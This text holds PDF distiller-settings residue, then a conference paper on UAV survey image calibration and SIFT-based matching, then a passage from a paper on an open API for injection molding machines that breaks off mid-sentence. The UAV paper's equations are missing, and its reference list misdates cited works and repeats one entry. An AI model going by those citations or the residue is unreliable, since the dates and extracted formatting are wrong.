<FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_kybbk22puncxpbwlwra5tzagve ---- 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 99 Research on the Key Technology of Survey Measurement Image Based on UAV Ding Li Health Services Administration Xi`an Medical University Xi’an, 710021, Shaanxi, China e-mail: 370486946@qq.com Chong Jiao School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, Shaanxi, China e-mail: 1342748406@qq.com Abstract—With the development of computer technology， especially the emergence of high resolution image sensor, aerial photogrammetry has played an important role in geological survey. Traditional aerial measurements are carried out by manned large aircraft, with a large volume of measured information and a wide range of shots. This method is suitable for large area operation, which is high and expensive for hardware site. UAV air measurement systems are usually used for small area measurements. The UAV is small and fluctuates greatly during flight, the collection of the data and images are not accurate enough. This paper has obtained the accurate measurement of image by studying the image fast matching theory, which has practical significance in the actual mapping and has higher research value. Keywords-UAV; Measurement Image; Image Validation; Image Preprocessing; Image Matching; Feature Extraction I. INTRODUCTION Quadrotor or Quadrotor UAV, simply called UAV, is a type of UAV that has four propellers and crosses the propeller. It can record aerial video with a miniature camera. At present, UAV surveying mainly relies on image aerial camera to capture images. Traditional measuring cameras are not only expensive, but also require film image scanning to acquire digital images with low shooting quality and long measuring time. In this paper, a non-metric camera CCD is used for image acquisition, the advantages of CCD camera are low prices, sensor stability, and high sensitivity. Non-metric cameras cannot directly measure because of the large distortion correction error, so it must be calibrated before carrying out aerial photography. II. UAV IMAGE PREPROCESSING The UAV photography system is equipped with a non-metric digital camera, which has unstable performance, uncertain orientation elements and results in optical distortion error in aerial photography. Optical distortion errors include radial distortion and decentering distortion. The focal length of the camera is fixed in this system, so the difference in distortion is the systematic error, which produces the same image for all images collected. The methods of camera calibration include optical laboratory calibration, laboratory calibration and office calibration. The experimental field is consisted of mark points in some known space coordinates. During the calibration process, the experimental field is photographed with the calibrated camera, and inner element and other elements that affect the shape of the beam are solved according to the intersection of the single-chip space or the multiple-chip space [1]. This system used UAV digital camera calibration software Easy Calibrate to calibrate digital camera SonyRx100 in the 2D experimental calibration field. The test results and contents are showed in table 1., and origin of coordinate is in the lower left corner of the image. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 100 TABLE I. THE CALIBRATION RESULTS OF SONY RX100 CAMERA Contents of Calibration Value of Calibration Comment x0 -0.008214mm Camera interior azimuth element y0 -0.003216mm focus f 10.41234 coefficient of radial distortion k1 2.12E-10 Radial distortion error coefficient coefficient of radial distortion k2 -8.14E-18 coefficient of eccentric aberration p1 3.14E-7 Tangential distortion error coefficient coefficient of eccentric aberration p2 -1.42E-7 Correction of image distortion -- Indirect method, the coordinates of the corresponding point on the original image is calculated from the coordinates on the corrected image, and the image correction is implemented with the grayscale interpolation method [2]. As shown in Figure 1. P’Y’ X’ P X Y P Gray value assignment Grayscale resampling Calculate the image point coordinates Postcorrected image Distortion image Figure 1. Image distortion correction schematic diagram After years of research, the corrected value of the corrected image can be calculated by the deformation error correction model, and the deformation error correction model: (1) (2) x, y: coordinate of the image point which origin is the center of the image, x0, y0 : coordinates of the main point of the image (3) 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 101 : The error coefficient of radial distortion The error coefficient of eccentric aberration : The non-square scaling factor of pixels The arranged non-orthogonal error coefficients in the CCD array The coordinate of the camera in the camera is calculated with space resection method, and the accuracy of the high-outer azimuth elements is improved, and the precision of geometric calibration is improved. The attitude control of UAV is mainly through the signal of the attitude sensor. The attitude sensor includes the tilt sensor and the angular velocity sensor. The titlt sensor is implemented indirectly through the triaxial acceleration sensor [3]. The output signals represent the current three axial acceleration values. If the UAV remain static in space, then the acceleration values are simply converted to get the real dip parameters. However, it is impossible for an UAV to keep stationary in the air. Under the influence of the wind, the UAV may deviate in one direction. At this point, even if the UAV does maintain its level, the output of the acceleration sensor still deviate from the center value, resulting in misjudgment of the control core. In order to avoid this situation, it is necessary to introduce triaxial angular velocity sensors and ultrasonic range finder, the acceleration in the X and Y direction is corrected to obtain true tilt information with the three axial angular velocities and the acceleration in the Z-axis direction and the rate of change of the real-time height [4]. III. UNMANNED AERIAL VEHICLE IMAGE MATCHING The image matching technique generally adopts image matching technology. The corresponding matching algorithm is used to identify the same name point between two images or multiple images. Commonly used matching methods can be divided into two major categories, one is based on the matching of grayscale and the other is based on feature matching [5]. In this paper, the SIFT feature matching algorithm is used for high-precision matching of massive data. The SIFT matching algorithm is based on the matching of local features of the image. The algorithm holds invariance to translation, rotation occlusion, and so on, so it has strong stability in practice. The feature matching process is shown in Figure 2. Scale space extreme value detection precise positioning Determine the main direction of the key points Key point descriptor Match feature point SIFT features vector matching Figure 2. Feature matching flow chart A. Pyramid Image Pyramid image refers to the original image are decomposed to obtain a series of sub-images of different resolutions. The images are sorted by resolution from small to large, and then forming a set of pyramidal overlapping images. Find the matching point in the top level image, the matching position is used as the prediction position of the next layer, and the matching result of this layer is used as the initial matching position of the next layer to perform matching in order, and the matching result is used as control to match other feature points [6]. This top-down and coarse-to-fine process ensures the reliability of the image search process. In the pyramid structure, images are represented in a hierarchical structure. At the top of the pyramid structure, the lowest resolution of data is stored. With the increase of the layers of the pyramid, the resolution of the data is sequentially reduced. At the bottom of the pyramid, the highest resolution data that can meet the need of users is stored. Under the spatial reference, information is stored and displayed at different resolutions according to user needs, forming a pyramid structure with low-to-high resolution and small to large amount of data. The image pyramid structure is used for image coding and progressive image transmission. It is a typical hierarchical data structure form, suitable for multi-resolution organization of raster data and image data, 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 102 and also a kind of lossy compression of raster data or image data. B. Image Feature Extraction Feature extraction refers to using a computer to propose image information of the same name point in the image, which determines the common features in the image. The image feature extraction generally relies on the distribution of grayscale in the image, and the position, shape and size of the features are determined by this information. The SIFT feature matching algorithm mainly consists of two parts, extracting unrelated vector features from multiple images and matching SIFT feature vectors. The scale space representation is an area-based expression. As an important concept in the scale space theory, the scale space is defined as the product of a Gaussian convolution kernel and a remote sensing image. After derivation by Koendetink and Babaud et al., it is proved that the Gaussian kernel is the only linear kernel that realizes scale transformation. (4) L(x, y, σ) is a scale space, G(x, y, σ) is a Gaussian convolution kernel, and I(x, y) is a remote sensing image. x, y, and σ represent location parameters and scale parameters. (5) Using the scale space function to establish the Gaussian pyramid, the scale space function between two adjacent layers is influenced by the scale ratio between adjacent layers and the same order pyramid, and a differential Gaussian pyramid is established. The scale ratio between adjacent layers is defined as k, and the scale factor is defined as σ, and D(x, y, σ) is a differential Gaussian pyramid. Finally, each sample point is compared with the adjacent point in the space of the adjacent vertical and horizontal scales around the scale space of the same level. If the detection point is the local maximum or minimum value, the point will be a candidate for image at this scale. IV. EXPERIMENTAL TEST Installed Visual Studio 2017 on the computer and configured OpenCV for experimental testing. The experimental image is shown in Figure 3. SIFT uses C++ to extract image feature points, uses the two-dimensional feature point matching method Brute Force Matcher to match, sets a certain threshold to filter the matching results, uses the FindHomography function to set the RANSAC method to eliminate false matching, and tests the SIFT to understand its performance according to the above steps. After the threshold value and the basic matrix filter, the points are basically covered in the key area of the image, the distribution of pixel points is relatively uniform, and the error is low, which can meet the matching requirements of the system. The matching test image is shown in figure 3. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 103 Figure 3. Feature Matching Experiments V. CONCLUSION At present, all countries in the world are stepping up the development of UAV. Compared to manned aircraft, UAV has the advantages of small size, low cost, ease of use, low environmental requirements, and strong survivability. Western countries have applied new and high technologies to the development of UAV, and advanced signal processing and communication technologies have been used to improve the image transmission speed and digital transmission speed of UAV. In this paper, based on the theory of air measurement image preprocessing, the image feature extraction method is studied. Visual c + + is used to implement SIFT to extract the image feature points. The two-dimension feature point matching method BruteForce Matcher is used to perform image region matching, and RANSAC is set by FindHomography function to eliminate false matches. We obtain the more satisfactory result of match after experiments. However, due to the deficiencies of UAV, it is difficult to compare with the professional image processing system. With the development of communication technology and control technology, UAV will surely have breakthrough application and development in the field of low-level measurement in the further. REFERENCE [1] Yu Sheng, Wen Caiqiang, Liu Shangguo. The precision measurement technology of digital camera indoor three-dimensional field [J].2012.01. [2] Tian Lei, Ma Ran. Research on the calibration method of unmanned aerial vehicle (UAV) [J].2016.07. [3] Li Xiang, Wang Yongjun, Li Zhi. Misalignment error and correction of the vector sensor of air position system [J]. Journal of sensor technology, 2017.02. [4] C. Harris, M. J. Stephens. A Combined Corner and Edge Detector[C]. Prco of the 4th Alvey Vision Conf, 2016: 147-152. [5] D. G. Lowe. Distinctive Image Features from Scale-Invariant Keypoints[J]. International Journal of Computer Vision.2014, 60(2): 91-110. [6] D. G. Lowe. Distinctive Image Features from Scale-Invariant Keypoints[J]. International Journal of Computer Vision.2014, 60(2): 91-110. work_kzvr63abvncexodi4czyqwcfwm ---- Submitted 30 March 2020 Accepted 21 September 2020 Published 2 November 2020 Corresponding author Olga Ogorodnyk, olga.ogorodnyk@ntnu.no Academic editor James Procter Additional Information and Declarations can be found on page 17 DOI 10.7717/peerj-cs.302 Copyright 2020 Ogorodnyk et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Towards a general application programming interface (API) for injection molding machines Olga Ogorodnyk1, Mats Larsen2, Ole Vidar Lyngstad2 and Kristian Martinsen1 1 Department of Manufacturing and Civil Engineering, Norwegian University of Science and Technology (NTNU), Gjøvik, Norway 2 SINTEF Manufacturing, Raufoss, Norway ABSTRACT Injection molding is a complicated process, and the final part quality depends on many machine and process parameters settings. To increase controllability of the injection molding process, acquisition of the process data is necessary. This paper describes the architecture and development of a prototype of an open application programming interface (API) for injection molding machines (IMMs), which has the potential to be used with different IMMs to log and set the necessary process parameter values. At the moment, the API includes an implementation of EMI data exchange protocol and can be used with ENGEL IMMs with CC300 and RC300 controllers. Data collection of up to 97 machine and process parameters (the number might vary depending on the type of machine at hand), obtained from sensors installed in the machine by the manufacturer is allowed. The API also includes a module for the acquisition of data from additional 3d party sensors. Industrial Raspberry Pi (RevPi) was used to perform analog-to- digital signal conversion and make sensors data accessible via the API prototype. The logging of parameters from the machine and from sensors is synchronized and the sampling frequency can be adjusted if necessary. The system can provide soft real-time communication. Subjects Real-Time and Embedded Systems, Scientific Computing and Simulation Keywords Application programming interface (API), Data acquisition system, Injection molding, Open source, Industry 4.0, Cyber-physical systems INTRODUCTION Manufacturing systems gradually become more sophisticated due to an increasing demand on quality of manufactured products, production system performance, as well as economic profitability (Yin et al., 2014). Therefore, data acquisition, process monitoring and control are becoming more and more important in the manufacturing industry (Negri, Fumagalli & Macchi, 2017). A significant number of studies stress the importance of collection and analysis of data from different manufacturing processes and injection molding is no exception (Vrabič, Kozjek & Butala, 2017). The concepts of Industry 4.0 and cyber-physical systems (CPS) are important drivers for this development. It is becoming increasingly common to demand machine tools equipped with sensors from the machine tool manufacturers, and later to add sensors from the 3d party sensor suppliers. Appropriate sensors in machine tools, dies and molds can provide How to cite this article Ogorodnyk O, Larsen M, Lyngstad OV, Martinsen K. 2020. Towards a general application programming inter- face (API) for injection molding machines. PeerJ Comput. Sci. 6:e302 http://doi.org/10.7717/peerj-cs.302 https://peerj.com/computer-science mailto:olga.ogorodnyk@ntnu.no https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.302 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.302 useful information such as temperature and pressure, while communication protocols, e.g., MTConnect and OPC/UA allow the recording of the necessary controller signals (Lee, Kao & Yang, 2014). Using data acquired from these sensors can assist quality control routines and could establish models for suggestion of optimal process parameters (Zhao et al., 2014), decrease scrap rates and energy usage through the elimination of production cycles that produce defect parts and minimize unwanted ‘‘manual adjustments and variations on product quality’’ (Saldivar et al., 2016). Before the start of the production of an injection molded part, parameter values such as holding pressure, backpressure, cooling time, injection speed, screw speed and others need to be set. These parameter settings influence the part quality, and erroneous parameter values might cause various defects (Zhao et al., 2014; Ogorodnyk & Martinsen, 2018). To aid the operation of the IMMs, many suppliers offer manufacturing execution systems (MES), which include data logging functions. These systems can be more or less complicated, although they will usually provide such functions as monitoring of machine status, remote access to machine set-up, data logging of machine and process parameters and displaying the data in a feasible way. Examples of such systems are TIG’s authentig (TIG. TIG authentig, 2020), ARBURG’s Host computer system (ALS) (ARBURG. Host computer system , ALS), KraussMafei’s MaXecution (KraussMaffei. MaXecution, 2020), MES HYDRA (MDPV. Manufacturing Execution System HYDRA, 2020), SAP Manuacturing Execution (SAP. SAP Manufacturing Execution, 2020) and Polmak Plastik QMaster (Polmak_Plastik. Polmak Plastik Products, 2020). There are, however, challenges for the usage of these systems for analysis and research purposes. 1. They are rather costly and often compatible only with newer generations of IMMs and IMM controllers. 2. It might be hard to synchronize data logging from machine built-in sensors with logging of data from 3d party sensors installed in the mold. 3. The MES systems often log data only once per production cycle and this might lead to missing information about the process dynamics and peak values of process parameters. 4. Commercially available MES software has a closed architecture that does not always allow to access all the machine and process data of interest, this might be an obstacle in terms of research and advanced process data analysis. Therefore, in this article a question of how to design a universal API to control and monitor injection molding for the next generation industrial systems is discussed. A prototype solution of an open API that allows interaction with IMM’s control unit is presented and made available through the following repository: https://github.com/SintefManufacturing/ IMM_API. The prototype allows collection of production data through EMI data exchange protocol and can be built on to add support for other IMMs or new data collection functionality. Ogorodnyk et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.302 2/20 https://peerj.com https://github.com/SintefManufacturing/IMM_API https://github.com/SintefManufacturing/IMM_API http://dx.doi.org/10.7717/peerj-cs.302 Figure 1 Research methodology steps. Full-size DOI: 10.7717/peerjcs.302/fig-1 BACKGROUND AND REQUIREMENTS TO THE PROPOSED API The described study is based on four main steps shown in Fig. 1. At first, a problem and requirements analysis was conducted. This included review of several available manufacturing execution systems, communication protocols used for connection of IMMs to other devices, as well as studies related to the development of similar systems by academia. In addition, the stakeholders’ needs and requirements for an IMM API were identified. The primary stakeholders in this case are the companies and research institutions participating in the project, while potential stakeholders include the IMM manufacturers, other injection molding companies and researchers. The second step was dedicated to summarizing which models and frameworks are to be used to develop the proposed API prototype and creation of the implementation schemes of the system (UML diagrams). The third step included development of the prototype. In the final step, the system was tested with different sampling frequencies to assess its performance. Injection molding process Injection molding is one of the most widely used processes for production of polymeric products, as about 30% of them are manufactured using this process (Osswald & Hernandez-Ortiz, 2006). It is a cyclic process for production of identical parts through injection of molten material into a mold cavity of a desired shape (Zheng, Tanner & Fan, 2011). Its main advantage is an ability to fabricate high volumes of parts of various sizes and geometries, from the smallest components (micro-injection molding) to entire car body panels. The reciprocating screw IMMs are mostly used for production of the injection molded parts. Their main components are a hopper, a rotating screw, a heated barrel and a clamping unit consisting of a mold typically made of two halves. An injection molding cycle usually includes the following phases: plasticization, injection, packing, cooling and ejection (Zheng, Tanner & Fan, 2011). During the plasticization stage Ogorodnyk et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.302 3/20 https://peerj.com https://doi.org/10.7717/peerjcs.302/fig-1 http://dx.doi.org/10.7717/peerj-cs.302 plastic pellets are fed into the heated barrel through the hopper. Here they are melted, mixed and homogenized with help of the reciprocating screw. When enough plastic melt is accumulated, the screw moves forward and forces the molten material into the mold cavity at high velocity and pressure (injection phase). When the mold cavity is 95–98% full, the process switches from the constant velocity to the constant pressure control to avoid pressure spikes. At the point, when the cavity is completely filled, the packing stage starts: the screw stays in the forward position or keeps moving with a small displacement to maintain the necessary holding pressure. The material cools down and shrinks allowing another small portion of the material to enter the cavity. This stage continues until the material in the cavity entrance solidifies. Next, the holding pressure is reduced to a value close to zero and the part continues to cool down and solidify (cooling) until the mold is opened and the part is ejected (ejection). To achieve a repeatable process that allows production of high quality parts with specific material properties, a significant number of machine and process parameters need to be considered. Many of them, however, are dynamic, and adopt a characteristic curve over the production cycle. Examples of such parameters are screw speed, rotation speed, material cushion, mold temperature and pressure, etc. Most of these parameters can be acquired from the IMM sensors installed by its manufacturer, however, some require additional sensors in the molds, as for example, the mold temperature and pressure data. This data is suggested as one of the essential indicators of production of the high quality parts, as it reflects the evolution of the polymer conditions inside the mold, and is used and investigated by both industry and academia (Zhao et al., 2014; Kurt et al., 2009; Kurt et al., 2010; Ageyeva, Horváth & Kovács, 2019). There are a number of sensors available on the market for installation in molds (piezoelectric/piezoresistive, strain gage, surface mounted thermocouples, ultrasonic sensors, optical sensors, etc.). Some of them have operating temperatures that do not allow insertion into the mold cavity and touching the molten material (indirect, contact-free measurement), while others are able to operate in these extreme conditions (direct measurement) (Ageyeva, Horváth & Kovács, 2019). The frequencies for logging the IMM and mold data may differ depending on the further use of this data, as well as on the size of the produced part. For example, if a part is manufactured using micro-injection molding and its cycle time is equal to a couple of seconds, a higher logging frequency might be of interest, however, if a bigger part is produced and the cycle time is longer the frequency of interest might be lower. Commercially available MES and solutions proposed by academia MES are computerized systems used in manufacturing to obtain the necessary data from the production floor in order to optimize the production output (Mahmoud et al., 2015). A suitable data exchange protocol needs to be utilized to establish communication between an IMM and an MES or a PC. Currently, the most widely used protocols are EUROMAP63 and EUROMAP77. EUROMAP63 was developed in 2000 and uses file- based data transfer (EUROMAP, 2020). EUROMAP77 was released in 2018 and is based on OPC/UA to be applied in Industry 4.0 cases. EUROMAP77’s downside is that it is not directly connected to the IMM’s control loop and thus it might not be able to guarantee Ogorodnyk et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.302 4/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.302 real-time or soft real-time communication. Another example of a data exchange interface is ENGEL Machine Interface (EMI). EMI is directly connected to the machine’s control loop via Ethernet (TCP/IP protocol) and communication is based on XML byte streams. EMI is much faster in comparison to EUROMAP63, as EMI exchanges data approximately every 0.05 s, while EUROMAP63 exchange period is 1-2 s, based on the authors’ experience. There exist a significant number of manufacturing execution systems applicable to injection molding. Table 1 shows functionality in terms of the process data collection and openness of some of the MES systems used by the injection molding companies. There are, other systems available on the market, however, most of them are similar to each other in a sense that their functionality misses either (a) openness for changes and addition of custom modules developed by the system’s users and not only developers, (b) synchronized acquisition of data from both machine and 3d party sensors or (c) ability to adjust the sampling rate. The functionality of the available systems could be adjusted to enable realization of (a)–(c), thereby enabling a new use-case of the commercially available systems making them more open and flexible for research and development purposes. When it comes to the solutions proposed by academia, the authors have found only a few examples of the development of open APIs capable of solving the above-described challenges. The literature, however, does include examples of systems for the acquisition of data from sensors additionally installed on the IMMs, and descriptions of rapid testing of novel algorithm prototypes. In (Tellaeche & Arana, 2013) a ‘‘flexible data acquisition system that allows rapid implementation of complex algorithms to assess their correct performance and can be integrated in the quality control process’’ is proposed. The system is based on one of National Instruments (NI) data acquisition systems (DAQs) and is used to log data from two force sensors installed in a mold. No data from in-built machine sensors are being used in this study, due to the inability to access it. A similar case is described in (Zhou et al., 2017), where mold temperature, screw displacement and velocity data are recorded through the installation of additional (not provided by machine manufacturer) sensors in the IMM, as well as the mold. In Zhao et al. (2014), different types of sensors and probes (thermocouples, displacement and pressure probes) are installed in an injection molding machine and data collection cards are used to transform analog, discrete and temperature signals to the digital ones. Most of this data can be acquired from sensors already installed in an IMM by its manufacturer, but due to the restriction of commercial software and hardware, new sensors needed to be installed to get easy access to data and to test necessary algorithms and routines developed by researchers. Zhang, Mao (Zhang et al., 2016), on the other hand, are trying to use some of machine built-in sensors, namely hydraulic pressure sensor to estimate nozzle pressure values and increase controllability of the injection molding process. In (Charest, Finn & Dubay, 2018) pressure transducers, thermocouples, velocity and position sensors, and flow sensors are installed and ‘‘interfaced using National Instruments data acquisition boards and a PC’’ to acquire the IMM data. Most of these reported studies use systems for data acquisition from 3d party sensors, and are not using the machine built-in sensors, due to the lack of a suitable way to acquire the data and communicate with the IMM controller. Development of an open API for the Ogorodnyk et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.302 5/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.302 Table 1 Comparison of commercial MES. Requirement TIG authentig (KraussMaffei, 2020) KraussMaffei MaXecution (KraussMaffei, 2020) AURBURG Host computer system (ALS) (ARBURG, 2020) MES HYDRA (MDPV, 2020) SAP Manuacturing Execution (SAP, 2020) Polmak Plastik QMaster (Polmak_Plastik, 2020) 1 Open for changes and addition of modules by the user (not producer) No No No No Yes (mostly for business applications) No 2 Compatibility with EUROMAP63, EU- ROMAP77, EMI Yes No Yes Yes Yes Yes 3 Acquisition of machine and process parameters Yes Yes Yes Yes Yes Yes 4 Set values of machine and process pa- rameters Yes Yes Yes Yes Yes Yes 5 Synchronized acquisition of data from built-in and additional sensors No No No No No No 6 Possibility to change sampling rate No No No No No Yes O gorodnyk etal. (2020),P eerJ C om put. S ci.,D O I10.7717/peerj-cs.302 6/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.302 IMMs by either MES producers or academia would bring new opportunities for research and analysis of the machine and process data. Requirements to an open application programming interface for IMMs Based on the above-described challenges to the commercially available MES, as well as on the project proposal related to this research certain functional requirements were formulated: 1. The API should be compatible with different communication protocols (EUROMAP63, EUROMAP77, EMI). 2. The interface should be open so that building upon existing software and rapid algorithm prototyping is possible if/when necessary. 3. The API should be capable of providing real-time or soft real-time logging depending on the end-user’s needs. Real-time scheduling communication means that missing a data sampling deadline (each 0.3 s, for example) is considered an error, while soft real-time means that it is better not to miss the deadline, but it is not an error to do so (Lee & Seshia, 2016). In case of the prototype further described in this article, a soft real-time logging and a 2 Hz sampling rate were required to be implemented based on the stakeholders’ requirements extracted from the related project proposal. 4. The acquisition of several parameter measurements per production cycle should be ensured. 5. It should be possible to get values of up to 97 desired machine and process parameters of an IMM (depending on the IMM’s model) and additionally installed sensors (if any). 6. The option of setting values of machine and process parameters, where the parameters are accessible, should be provided. 7. The setting of the values should not conflict with the IMM safety installations and non-permitted values that are too high or too low shall not be overwriting the permitted ones. 8. The developed system should ensure the synchronized acquisition of data from machine built-in sensors and 3d party sensors. In case of the prototype solution, logging of data from the IMM’s built-in sensors should be synchronized with temperature and pressure mold multi-sensors. In addition, such non-functional requirement as security needs to be considered. API implementations should ideally allow application layer security—such as authenticated access over secure HTTP via TLS, but this aspect is out of scope for this work. To sum up: a simple, open and safe application programming interface (API) which can get and set values of different parameters on the IMM, as well as values from additionally installed/external sensors, should be developed. To meet the above-listed requirements the API needs to include the functions/ methods shown in Table 2. DESIGN AND IMPLEMENTATION OF THE API’S PROTOTYPE An API is a software product that includes a number of clearly defined methods for communication between different components, in our case, between an IMM, a PC Ogorodnyk et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.302 7/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.302 Table 2 ‘‘ParameterList’’ description. Name of method Description of method start_logging(sampling_rate) By executing this method the system starts logging IMM’s process parameters with specified by a user sampling rate. ‘‘sampling_rate’’ parameter is the user-desired sampling rate in Hz. The logging sequence is stopped by launching the idle() method. get_process_param(names) This method returns actual and set values of chosen process parameter or list of parameters. Parameter name(s) is/are given as ‘‘names’’ argument of the method. This method is independent of the control loop. get_async_act_sample(params) Returns unsynchronized current value(s) of process parameter(s). Name of one or more parameters are given as ‘‘params’’ argument of the method. Method is independent of the control loop. set_process_param(name,value) This method sets a desired value of a specified process parameter on the IMM. Arguments ‘‘name’’ and ‘‘value’’ mean respectively process parameter’s name and desired value of that parameter. get_samples(number_of_shots) Method returns data sampled during certain number of production cycles (shots) buffered in a FIFO queue. ‘‘number_of_shots’’ parameter defines how many shots/cycles in the past user is interested in. event() Set API’s state to an event, can be launched externally with method event_sample(). event_sample() Trigger an event based sampling. The state has to be an event. idle() Set interface’s state to idle, a passive state where the connection is maintained. disconnect() Connection is ended and the API is shut down. and/or a data acquisition system connected to mold sensors. To develop the proposed API prototype, the Unified Process methodology for software development has been followed. This methodology includes four main phases: inception, elaboration, construction and transition (Jacobson, Booch & Rumbaugh, 1999). The Python3 programming language was chosen to program all the prototype modules, as it is easy to use, has a number of versatile features and libraries, can be utilized to practice distributed computing and be further extended in C++ or C. The IMM used in this study supports EUROMAP63 and EMI data exchange protocols. As mentioned before, EMI is capable of exchanging data significantly faster than EUROMAP63, therefore, it was selected to be used in the prototype implementation. PCMEF (presentation, control, domain and foundation) architectural framework (Maciaszek & Liong, 2005; Madeyski & Sochmialek, 2005) was applied for development of the API prototype’s distributed architecture. At the same time, the OSI 7 layer model (Open Systems Interconnection model) (Kurose & Ross, 2010) was followed for the creation of the communication design of the API, since the EMI exchange protocol is also based on this model. Ogorodnyk et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.302 8/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.302 Figure 2 Open API for IMM architecture diagram. Full-size DOI: 10.7717/peerjcs.302/fig-2 Description of the proposed system The proposed prototype API includes database and System APIs, which combines IMM interface and Data acquisition system for additional sensors (DAQ Interface) modules, as shown in Fig. 2. The System API is used (1) for the establishment of a connection with the injection molding machine and requesting and setting the corresponding parameter values, (2) for acquisition of data from any additionally installed machine and mold sensors. Note that the data from the IMM is only accessed through establishment of connection with the IMM and not acquired directly from the IMM sensors. This is due to a fact that the IMM has its own DAQ that is connected to the installed sensors and is logging their values during the machine runs. The database is 